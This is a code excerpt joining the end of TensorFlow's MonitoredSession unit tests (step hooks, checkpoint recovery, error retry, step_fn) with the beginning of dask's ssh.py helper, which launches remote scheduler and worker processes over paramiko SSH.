self.assertTrue(session.should_stop())
save_path = saver_lib._get_saver_or_default().save(
session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Run till step 5 and save.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(last_step=5)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(3, session.run(gstep))
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertEqual(5, session.run(do_step))
self.assertTrue(session.should_stop())
def test_num_steps(self):
logdir = _test_dir(self.get_temp_dir(), 'test_num_steps')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
# Do 3 steps and save.
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=3)]
with monitored_session.MonitoredSession(hooks=hooks) as session:
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
save_path = saver_lib._get_saver_or_default().save(
session._coordinated_creator.tf_sess,
os.path.join(logdir, 'step-3'))
# Restore and do 4 steps.
def load_ckpt(scaffold, sess):
scaffold.saver.restore(sess, save_path)
session_creator = monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(init_fn=load_ckpt))
hooks = [basic_session_run_hooks.StopAtStepHook(num_steps=4)]
with monitored_session.MonitoredSession(
hooks=hooks, session_creator=session_creator) as session:
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertFalse(session.should_stop())
session.run(do_step)
self.assertTrue(session.should_stop())
# This set of tests, verifies the supervised session behavior when exceptions
# are raised next to the innermost session run() call.
@test_util.run_deprecated_v1
def test_recovery(self):
logdir = _test_dir(self.get_temp_dir(), 'test_recovery')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
# Use a hook to save the model every 100 steps. It also saves it at
# the end.
hooks = [
basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir)) as session:
self.assertEqual(2, session.run(gstep))
# A restart will find the checkpoint and recover automatically.
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold,
checkpoint_filename_with_path=checkpoint_management.
latest_checkpoint(logdir))) as session:
self.assertEqual(2, session.run(gstep))
def test_retry_initialization_on_aborted_error(self):
# Tests that we silently retry on abort during initialization.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
self.init_raised_aborted_error = False
def _init_fn(scaffold, session):
_, _ = scaffold, session
if not self.init_raised_aborted_error:
self.init_raised_aborted_error = True
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold=monitored_session.Scaffold(
init_fn=_init_fn))) as session:
self.assertFalse(session.should_stop())
self.assertEqual(0, session.run(gstep))
self.assertTrue(self.init_raised_aborted_error)
def _retry_test(self, ex):
# Tests that we silently retry on error. Note that this does not test
# recovery as we do not use a CheckpointSaver in this test.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, ex)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically retries and restart from a freshly
# initialized session, so the step is back to 0 and running do_step
# moves it to 1.
self.assertEqual(1, session.run(do_step))
self.assertFalse(session.should_stop())
self.assertTrue(hook.raised)
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
def test_retry_on_aborted_error(self):
self._retry_test(errors_impl.AbortedError(None, None, 'Abort'))
def test_retry_on_unavailable_error(self):
self._retry_test(errors_impl.UnavailableError(None, None, 'Unavailable'))
def test_recover_and_retry_on_aborted_error(self):
# Tests that we silently retry and recover on abort. This test uses
# a CheckpointSaver to have something to recover from.
logdir = _test_dir(self.get_temp_dir(),
'test_recover_and_retry_on_aborted_error')
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
scaffold = monitored_session.Scaffold()
abort_hook = RaiseOnceAtCountN(
4, errors_impl.AbortedError(None, None, 'Abort'))
# Save after each step.
ckpt_hook = basic_session_run_hooks.CheckpointSaverHook(
logdir, save_steps=1, scaffold=scaffold)
hooks = [abort_hook, ckpt_hook]
with monitored_session.MonitoredSession(
session_creator=monitored_session.ChiefSessionCreator(
scaffold, checkpoint_dir=logdir),
hooks=hooks) as session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Here at step 3, the hook triggers and raises AbortedError. The
# MonitoredSession automatically restores and retries.
self.assertEqual(3, session.run(do_step))
self.assertTrue(abort_hook.raised)
self.assertFalse(session.should_stop())
self.assertEqual(4, session.run(do_step))
self.assertFalse(session.should_stop())
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_exit_cleanly_on_stop_iteration_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, StopIteration)
session = monitored_session.MonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises StopIteration. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_pass_through_run(self):
# Tests that regular exceptions just pass through a "with
# MonitoredSession" block and set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(4, RuntimeError('regular exception'))
session = monitored_session.MonitoredSession(hooks=[hook])
with self.assertRaisesRegex(RuntimeError, 'regular exception'):
with session:
self.assertEqual(0, session.run(gstep))
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# This triggers the hook and raises the exception
session.run(do_step)
# We should not hit this
self.assertFalse(True)
self.assertTrue(hook.raised)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.MonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegex(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_regular_exception_reported_to_coord_pass_through_return(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through returning from a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.MonitoredSession()
with self.assertRaisesRegex(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
self.assertTrue(session.should_stop())
# This set of tests, verifies the session behavior when exceptions are raised
# from code inside a "with MonitoredSession:" context.
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_raises_regular_exceptions_in_with_body(self):
# Tests that regular exceptions in "with body" are seen outside.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.MonitoredSession()
# We should see that exception.
with self.assertRaisesRegex(RuntimeError, 'regular exception'):
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Will be visible outside the "with body".
raise RuntimeError('regular exception')
# Should have closed.
self.assertTrue(session.should_stop())
self.assertTrue(session._is_closed())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.MonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_graph_finalized_during_run_unfinalized_after_exit(self):
with ops.Graph().as_default() as g:
a_var = variables.VariableV1(0)
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertFalse(g.finalized)
def test_keep_finalized_graph_as_finalized(self):
with ops.Graph().as_default() as g:
a_var = variables.VariableV1(0)
monitored_session.Scaffold().finalize()
with monitored_session.MonitoredSession() as session:
self.assertEqual(0, session.run(a_var))
self.assertTrue(g.finalized)
self.assertTrue(g.finalized)
def test_merge_run_options_from_hooks(self):
"""Test for rewriting RunOptions and observing RunMetadata with hooks."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
watch_a = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_a = RunOptionsMetadataHook(2, 30000, False, watch_a, False)
watch_b = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook_b = RunOptionsMetadataHook(3, 60000, True, watch_b, True)
with monitored_session.MonitoredSession(
hooks=[hook_a, hook_b]) as session:
self.assertEqual(42, session.run(my_const))
# trace_level=3 should have overridden trace_level=2;
# timeout_in_ms=60000 should have overridden 30000;
# output_partition_graphs=True should have overridden False.
# The two debug tensor watches should have been merged.
self.assertEqual([
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[watch_a, watch_b]),
report_tensor_allocations_upon_oom=True),
], hook_b.run_options_list)
self.assertEqual(1, len(hook_b.run_metadata_list))
self.assertTrue(
isinstance(hook_b.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook_b.run_metadata_list[0].partition_graphs), 0)
def test_merge_caller_and_hook_run_options(self):
"""Test that RunOptions from caller and hooks can be merged properly."""
with ops.Graph().as_default():
my_const = constant_op.constant(42, name='my_const')
_ = constant_op.constant(24, name='my_const_2')
hook_watch = debug_pb2.DebugTensorWatch(
node_name='my_const_2',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
hook = RunOptionsMetadataHook(2, 60000, False, hook_watch, False)
with monitored_session.MonitoredSession(hooks=[hook]) as session:
caller_watch = debug_pb2.DebugTensorWatch(
node_name='my_const',
output_slot=0,
debug_ops=['DebugIdentity'],
debug_urls=[])
caller_options = config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=30000,
output_partition_graphs=True,
report_tensor_allocations_upon_oom=True)
caller_options.debug_options.debug_tensor_watch_opts.extend(
[caller_watch])
self.assertEqual(42, session.run(my_const, options=caller_options))
# trace_level=3 from the caller should override 2 from the hook.
# timeout_in_ms=60000 from the hook should override from the caller.
# output_partition_graph=True from the caller should override False
# from the hook.
# The two debug watches from the caller and the hook should be merged,
# in that order.
self.assertEqual([
config_pb2.RunOptions(
trace_level=3,
timeout_in_ms=60000,
output_partition_graphs=True,
debug_options=debug_pb2.DebugOptions(
debug_tensor_watch_opts=[caller_watch, hook_watch]),
report_tensor_allocations_upon_oom=True),
], hook.run_options_list)
self.assertEqual(1, len(hook.run_metadata_list))
self.assertTrue(
isinstance(hook.run_metadata_list[0], config_pb2.RunMetadata))
self.assertGreater(len(hook.run_metadata_list[0].partition_graphs), 0)
@test_util.run_deprecated_v1
def test_with_statement_and_close(self):
# Test case for https://github.com/tensorflow/tensorflow/issues/12224
# where close() inside the with should have a better error message.
with self.assertRaisesRegex(RuntimeError, 'Session is already closed'):
with monitored_session.MonitoredSession() as session:
session.close()
def test_step_fn_example(self):
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
return value
with monitored_session.MonitoredSession() as session:
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
def test_step_function_stops(self):
with ops.Graph().as_default():
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession() as session:
self.assertEqual(None, session.run_step_fn(step_fn))
self.assertTrue(session.should_stop())
def test_step_request_stop_without_a_with_block(self):
with ops.Graph().as_default():
was_stop_iteration_raised = False
def step_fn(step_context):
step_context.request_stop()
session = monitored_session.MonitoredSession()
try:
self.assertEqual(None, session.run_step_fn(step_fn))
except StopIteration:
was_stop_iteration_raised = True
self.assertTrue(was_stop_iteration_raised)
self.assertFalse(session.should_stop())
def test_step_request_stop_in_a_loop(self):
with ops.Graph().as_default():
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession() as session:
while not session.should_stop():
_ = session.run_step_fn(step_fn)
self.fail('An exception should be raised on the line above.')
def test_step_request_stop_with_returning_a_type(self):
with ops.Graph().as_default():
def step_fn(step_context):
del step_context
return 'a type'
with monitored_session.MonitoredSession() as session:
self.assertEqual('a type', session.run_step_fn(step_fn))
def test_step_with_extra_arguments(self):
with ops.Graph().as_default():
def step_fn(step_context, extra_foo):
del step_context, extra_foo
with monitored_session.MonitoredSession() as session:
with self.assertRaisesRegex(
ValueError,
'`step_fn` may either have one `step_context` argument'):
self.assertEqual(None, session.run_step_fn(step_fn))
def test_step_fn_belongs_to_a_class(self):
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
class Model(object):
def step_fn(self, step_context):
return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
with monitored_session.MonitoredSession() as session:
model = Model()
self.assertNear(3.2, session.run_step_fn(model.step_fn), 0.1)
def test_step_fn_belongs_to_a_class_and_has_extra_methods(self):
with ops.Graph().as_default():
class Model(object):
def step_fn(self, step_context, extra_foo):
del step_context, extra_foo
with monitored_session.MonitoredSession() as session:
with self.assertRaisesRegex(
ValueError,
'`step_fn` may either have one `step_context` argument'):
model = Model()
self.assertEqual(None, session.run_step_fn(model.step_fn))
def test_step_fn_with_hooks(self):
with ops.Graph().as_default():
var = resource_variable_ops.ResourceVariable(0.0)
# This test highlights the interaction of hooks with
# `Monitoredsession.run_step_fn`. The order of execution of operations
# below is:
# 0. stage_0
# 1. stage_1_0 or stage_1_1 in an undefined order
# 2. stage_2
stage_0 = state_ops.assign_add(var, 0.3)
stage_1_0 = state_ops.assign_add(var, 0.7)
# The order of `stage_1_0` and `stage_1_1` is undefined by
# `MonitoredSession`, but we should be able to assert when both of them
# are complete. To obtain a consistent result of adding two different
# constants to `var`, we rely on a control dependency and
# `ResourceVariable`. Otherwise, it is possible that one of the
# additions overwrites the result of the other addition.
with ops.control_dependencies([stage_1_0]):
stage_1_1 = state_ops.assign_add(var, 0.5)
stage_2 = state_ops.assign_add(var, 1.1)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(fetches=stage_1_0)
def after_run(self, run_context, run_values):
self._testing.assertNear(0.3 + 0.5 + 0.7,
run_context.session.run(var), 0.1)
self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
run_context.session.run(stage_2), 0.1)
def step_fn(step_context):
self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
return step_context.run_with_hooks(fetches=stage_1_1)
with monitored_session.MonitoredSession(hooks=[Hook(self)]) as session:
self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_has_the_same_hooks_behavior_without_recovery(self):
with ops.Graph().as_default():
var = resource_variable_ops.ResourceVariable(0.0)
stage_0 = state_ops.assign_add(var, 0.3)
stage_1_0 = state_ops.assign_add(var, 0.7)
with ops.control_dependencies([stage_1_0]):
stage_1_1 = state_ops.assign_add(var, 0.5)
stage_2 = state_ops.assign_add(var, 1.1)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(fetches=stage_1_0)
def after_run(self, run_context, run_values):
self._testing.assertNear(0.3 + 0.5 + 0.7,
run_context.session.run(var), 0.1)
self._testing.assertNear(0.3 + 0.5 + 0.7 + 1.1,
run_context.session.run(stage_2), 0.1)
def step_fn(step_context):
self.assertNear(0.3, step_context.session.run(stage_0), 0.1)
return step_context.run_with_hooks(fetches=stage_1_1)
with monitored_session.SingularMonitoredSession(
hooks=[Hook(self)]) as session:
self.assertEqual(0.3 + 0.5 + 0.7, session.run_step_fn(step_fn))
def test_step_fn_with_hooks_and_request_stop(self):
with ops.Graph().as_default():
trace_the_hook = {'before_run': False, 'after_run': False}
class Hook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
trace_the_hook['before_run'] = True
def after_run(self, run_context, run_values):
trace_the_hook['after_run'] = True
def step_fn(step_context):
step_context.request_stop()
with monitored_session.MonitoredSession(hooks=[Hook()]) as session:
self.assertEqual(None, session.run_step_fn(step_fn))
self.assertTrue(session.should_stop())
# `step_context.request_stop()` in a step_fn interrupts the flow of
# running the hooks.
self.assertFalse(trace_the_hook['before_run'])
self.assertFalse(trace_the_hook['after_run'])
def test_recovers_from_an_exception_in_step_fn(self):
trace_the_exception = {'run_already': False}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
with monitored_session.MonitoredSession() as session:
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.assertTrue(trace_the_exception['run_already'])
def test_recovers_from_an_exception_in_step_fn_after_hooks(self):
trace_the_exception = {'run_already': False, 'side_effect_counter': 0}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
graph_state = variables.VariableV1(0.0)
graph_side_effect = state_ops.assign_add(graph_state, 0.31)
def step_fn(step_context):
trace_the_exception['side_effect_counter'] += 1
step_context.session.run(graph_side_effect)
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return value
with self.cached_session() as test_session:
with monitored_session.MonitoredSession(
CountingSessionCreator(test_session)) as session:
session.run(variables.global_variables_initializer())
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.assertTrue(trace_the_exception['run_already'])
# Make sure the rest of the body of the step_fn is re-executed upon
# AbortedError:
self.assertEqual(2, trace_the_exception['side_effect_counter'])
self.assertNear(0.62, session.run(graph_state), 0.1)
def test_step_fn_doesnt_recover_when_it_wasnt_asked_to(self):
trace_the_exception = {'run_already': False}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
def step_fn(step_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
value = step_context.run_with_hooks(fetches=v, feed_dict={c: 3.2})
return value
with monitored_session.SingularMonitoredSession() as session:
with self.assertRaisesRegex(errors_impl.AbortedError, 'Abort'):
self.assertNear(3.2, session.run_step_fn(step_fn), 0.1)
self.fail()
self.assertTrue(trace_the_exception['run_already'])
def test_step_fn_exception_from_before_run(self):
trace_the_exception = {'run_already': False, 'side_effect_counter': 0}
with ops.Graph().as_default():
c = array_ops.placeholder(dtypes.float32)
v = array_ops.identity(c)
vv = constant_op.constant(3.2)
graph_state = variables.VariableV1(0.0)
graph_side_effect = state_ops.assign_add(graph_state, 0.31)
class Hook(session_run_hook.SessionRunHook):
def __init__(self, testing):
self._testing = testing
def before_run(self, run_context):
if not trace_the_exception['run_already']:
trace_the_exception['run_already'] = True
raise errors_impl.AbortedError(None, None, 'Abort')
return session_run_hook.SessionRunArgs(fetches=vv)
def after_run(self, run_context, run_values):
self._testing.assertNear(3.2, run_values.results, 0.1)
def step_fn(step_context):
trace_the_exception['side_effect_counter'] += 1
step_context.session.run(graph_side_effect)
return step_context.run_with_hooks(fetches=v, feed_dict={c: 1.3})
with self.cached_session() as test_session:
with monitored_session.MonitoredSession(
CountingSessionCreator(test_session),
hooks=[Hook(self)]) as session:
test_session.run(variables.global_variables_initializer())
self.assertNear(1.3, session.run_step_fn(step_fn), 0.1)
self.assertEqual(2, trace_the_exception['side_effect_counter'])
self.assertNear(0.62, session.run(graph_state), 0.1)
class SingularMonitoredSessionTest(test.TestCase):
"""Tests SingularMonitoredSession."""
def test_handles_initialization(self):
with ops.Graph().as_default():
a_var = variables.VariableV1(0)
with monitored_session.SingularMonitoredSession() as session:
# If it's not initialized, following statement raises an error.
self.assertEqual(0, session.run(a_var))
def test_do_not_handle_aborted_error(self):
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
class _RaiseAbortedHook(session_run_hook.SessionRunHook):
def before_run(self, run_context):
raise errors_impl.AbortedError(None, None, 'Abort')
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
with self.assertRaises(errors_impl.AbortedError):
self.assertEqual(0, session.run(gstep))
with self.assertRaises(errors_impl.AbortedError):
with monitored_session.SingularMonitoredSession(
hooks=[_RaiseAbortedHook()]) as session:
self.assertEqual(0, session.run(gstep))
def test_exit_cleanly_on_out_of_range_exception(self):
# Tests that we stop cleanly when OutOfRange is raised.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
hook = RaiseOnceAtCountN(2, errors_impl.OutOfRangeError(None, None,
'EOI'))
session = monitored_session.SingularMonitoredSession(hooks=[hook])
# session should cleanly exit from the context.
with session:
self.assertEqual(0, session.run(gstep))
self.assertFalse(session.should_stop())
# Here at step 1, the hook triggers and raises OutOfRange. The
# session should go into should_stop() mode. It should raise the
# exception. So next step should not be executed.
session.run(do_step)
self.assertTrue(False)
self.assertTrue(session.should_stop())
def test_regular_exception_reported_to_coord_pass_through_run(self):
# Tests that regular exceptions reported to the coordinator from a thread
# passes through a "run()" call within a "with MonitoredSession" block and
# set the session in stop mode.
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
session = monitored_session.SingularMonitoredSession()
run_performed_without_error = False
with self.assertRaisesRegex(RuntimeError, 'a thread wants to stop'):
with session:
self.assertEqual(0, session.run(gstep))
# Report an exception through the coordinator.
try:
raise RuntimeError('a thread wants to stop')
except RuntimeError as e:
session._coordinated_creator.coord.request_stop(e)
# Call run() which should perform normally.
self.assertEqual(0, session.run(gstep))
run_performed_without_error = True
self.assertTrue(run_performed_without_error)
def test_stop_cleanly_when_no_exception_in_with_body(self):
# Tests that regular exceptions pass through
with ops.Graph().as_default():
gstep = training_util.get_or_create_global_step()
do_step = state_ops.assign_add(gstep, 1)
session = monitored_session.SingularMonitoredSession()
with session:
self.assertEqual(1, session.run(do_step))
self.assertEqual(2, session.run(do_step))
self.assertFalse(session.should_stop())
# Should have closed.
self.assertTrue(session.should_stop())
self.assertEqual(None, session.raw_session())
def test_graph(self):
with ops.Graph().as_default() as g:
with monitored_session.SingularMonitoredSession() as session:
self.assertEqual(g, session.graph)
def test_raw_session(self):
with ops.Graph().as_default():
with monitored_session.SingularMonitoredSession() as session:
self.assertTrue(isinstance(session.raw_session(), session_lib.Session))
if __name__ == '__main__':
test.main()
|
ssh.py
|
from __future__ import print_function, division, absolute_import
import logging
import socket
import os
import sys
import time
import traceback
try:
from queue import Queue
except ImportError: # Python 2.7 fix
from Queue import Queue
from threading import Thread
from toolz import merge
from tornado import gen
logger = logging.getLogger(__name__)
# These are handy for creating colorful terminal output to enhance readability
# of the output generated by dask-ssh.
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def async_ssh(cmd_dict):
import paramiko
from paramiko.buffered_pipe import PipeTimeout
from paramiko.ssh_exception import (SSHException, PasswordRequiredException)
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
retries = 0
while True: # Be robust to transient SSH failures.
try:
# Set paramiko logging to WARN or higher to squelch INFO messages.
logging.getLogger('paramiko').setLevel(logging.WARN)
ssh.connect(hostname=cmd_dict['address'],
username=cmd_dict['ssh_username'],
port=cmd_dict['ssh_port'],
key_filename=cmd_dict['ssh_private_key'],
compress=True,
timeout=20,
banner_timeout=20) # Helps prevent timeouts when many concurrent ssh connections are opened.
# Connection successful, break out of while loop
break
except (SSHException,
PasswordRequiredException) as e:
print('[ dask-ssh ] : ' + bcolors.FAIL +
'SSH connection error when connecting to {addr}:{port}'
'to run \'{cmd}\''.format(addr=cmd_dict['address'],
port=cmd_dict['ssh_port'],
cmd=cmd_dict['cmd']) + bcolors.ENDC)
print(bcolors.FAIL + ' SSH reported this exception: ' + str(e) + bcolors.ENDC)
# Print an exception traceback
traceback.print_exc()
# Transient SSH errors can occur when many SSH connections are
# simultaneously opened to the same server. This makes a few
# attempts to retry.
retries += 1
if retries >= 3:
print('[ dask-ssh ] : '
+ bcolors.FAIL
+ 'SSH connection failed after 3 retries. Exiting.'
+ bcolors.ENDC)
# Connection failed after multiple attempts. Terminate this thread.
os._exit(1)
# Wait a moment before retrying
print(' ' + bcolors.FAIL +
'Retrying... (attempt {n}/{total})'.format(n=retries, total=3) +
bcolors.ENDC)
time.sleep(1)
# Execute the command, and grab file handles for stdout and stderr. Note
# that we run the command using the user's default shell, but force it to
# run in an interactive login shell, which hopefully ensures that all of the
# user's normal environment variables (via the dot files) have been loaded
# before the command is run. This should help to ensure that important
# aspects of the environment like PATH and PYTHONPATH are configured.
print('[ {label} ] : {cmd}'.format(label=cmd_dict['label'],
cmd=cmd_dict['cmd']))
stdin, stdout, stderr = ssh.exec_command('$SHELL -i -c \'' + cmd_dict['cmd'] + '\'', get_pty=True)
# Set up channel timeout (which we rely on below to make readline() non-blocking)
channel = stdout.channel
channel.settimeout(0.1)
def read_from_stdout():
"""
Read stdout stream, time out if necessary.
"""
try:
line = stdout.readline()
while len(line) > 0: # Loops until a timeout exception occurs
line = line.rstrip()
logger.debug('stdout from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : {output}'.format(label=cmd_dict['label'],
output=line))
line = stdout.readline()
except (PipeTimeout, socket.timeout):
pass
def read_from_stderr():
"""
Read stderr stream, time out if necessary.
"""
try:
line = stderr.readline()
while len(line) > 0:
line = line.rstrip()
logger.debug('stderr from ssh channel: %s', line)
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL + '{output}'.format(output=line) + bcolors.ENDC)
line = stderr.readline()
except (PipeTimeout, socket.timeout):
pass
def communicate():
"""
Communicate a little bit, without blocking too long.
Return True if the command ended.
"""
read_from_stdout()
read_from_stderr()
# Check to see if the process has exited. If it has, we let this thread
# terminate.
if channel.exit_status_ready():
exit_status = channel.recv_exit_status()
cmd_dict['output_queue'].put('[ {label} ] : '.format(label=cmd_dict['label']) +
bcolors.FAIL +
"remote process exited with exit status " +
str(exit_status) + bcolors.ENDC)
return True
# Wait for a message on the input_queue. Any message received signals this
# thread to shut itself down.
while cmd_dict['input_queue'].empty():
# Kill some time so that this thread does not hog the CPU.
time.sleep(1.0)
if communicate():
break
# Ctrl-C the executing command and wait a bit for command to end cleanly
start = time.time()
while time.time() < start + 5.0:
channel.send(b'\x03') # Ctrl-C
if communicate():
break
time.sleep(1.0)
# Shutdown the channel, and close the SSH connection
channel.close()
ssh.close()
def start_scheduler(logdir, addr, port, ssh_username, ssh_port, ssh_private_key, remote_python=None):
cmd = '{python} -m distributed.cli.dask_scheduler --port {port}'.format(
